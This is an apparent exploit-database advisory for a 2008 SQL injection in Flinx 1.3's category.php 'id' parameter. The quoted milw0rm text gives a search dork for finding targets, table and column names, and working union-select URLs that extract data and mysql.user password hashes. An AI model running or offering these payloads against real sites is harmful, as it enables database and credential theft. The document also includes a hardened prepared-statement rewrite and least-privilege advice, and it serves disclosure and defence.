Vendor: Flinx
By: Houssamix
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: Flinx
Affected Version From: 1.3 & Below
Affected Version To: 1.3 & Below
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Flinx 1.3 & Below Remote SQL Injection Vulnerability

Flinx 1.3 and below is vulnerable to SQL injection through the 'id' parameter of category.php, which is placed unquoted and unvalidated into the script's SQL queries. An attacker can use this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Flinx.

Exploit-DB raw data:

--------------------------------------------------------------
            H-T Team [ HouSSaMix + ToXiC350 + RxH ]
--------------------------------------------------------------
# Author : Houssamix From H-T Team
# Script : flinx 1.3 & below                                          
# Download : http://rapidshare.com/files/86100439/flinx.rar.html (Nulled)                         
# BUG :  Remote SQL Injection Vulnerability  
# Dork : Powered by Flinx

## Vulnerable CODE :
~~~~~~~~ category.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?
$query="SELECT linkID FROM $table_link WHERE relCatID=$id";
$queryl=mysql_query($query);
$count=mysql_numrows($queryl);
$result=mysql_query("SELECT name FROM $table_cat WHERE catID=$id");
if ($row=mysql_fetch_array($result)){
do{
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
[Target.il]/[flinx_path]/category.php?id=[SQL-CODE]

table and column names
=> table :  flinx_cat
columns :  name / catid
=> table : flinx_link
columns :  name  / url / image / relCatID / width / height

example :
http://site.com/flinx/category.php?id=-999 union select name from flinx_cat--

we can also try to get user and password from mysql.user :
our user needs to be root@localhost or a MySQL administrator, check:
http://site.com/flinx/category.php?id=-999/**/union/**/select/**/user()/*
user and password from mysql.user:
http://site.com/flinx/category.php?id=concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# Gr33tz :  CoNaN - V40 - Mahmood_ali - RaChiDoX & all muslims hackers       

# milw0rm.com [2008-01-25]
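
A hardened form of the two category.php queries quoted above, as an added example (it is not the vendor's patch and not code from the advisory). It assumes an open mysqli connection in `$db` and the table names flinx_cat and flinx_link listed in the advisory; the function names are hypothetical.

```php
<?php
// Added example, not Flinx code. Function names are hypothetical.
// Assumes $db is an open mysqli connection and the table names are the
// flinx_cat / flinx_link listed in the advisory (fixed, never from input).

// Accept only a plain positive decimal integer. Inputs shaped like the
// advisory's payloads ("-999 union select ...", "1/**/union") yield null.
function flinx_category_id($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

function flinx_category(mysqli $db, $rawId): ?array
{
    $id = flinx_category_id($rawId);
    if ($id === null) {
        return null; // rejected before any query is built
    }

    // The value travels as a bound integer parameter, never as SQL text.
    $stmt = $db->prepare('SELECT name FROM flinx_cat WHERE catID = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($name);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return null; // unknown category
    }

    // Same count the original derived from mysql_numrows().
    $stmt = $db->prepare('SELECT COUNT(*) FROM flinx_link WHERE relCatID = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($count);
    $stmt->fetch();
    $stmt->close();

    return ['id' => $id, 'name' => $name, 'links' => (int) $count];
}

// Constructed usage in category.php:
// mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// $cat = flinx_category($db, $_GET['id'] ?? null);
// if ($cat === null) { http_response_code(404); exit; }
```

The advisory's mysql.user step depends on the application connecting as root or a MySQL administrator; running Flinx under an account limited to SELECT on its own tables removes that path even if another injection point exists.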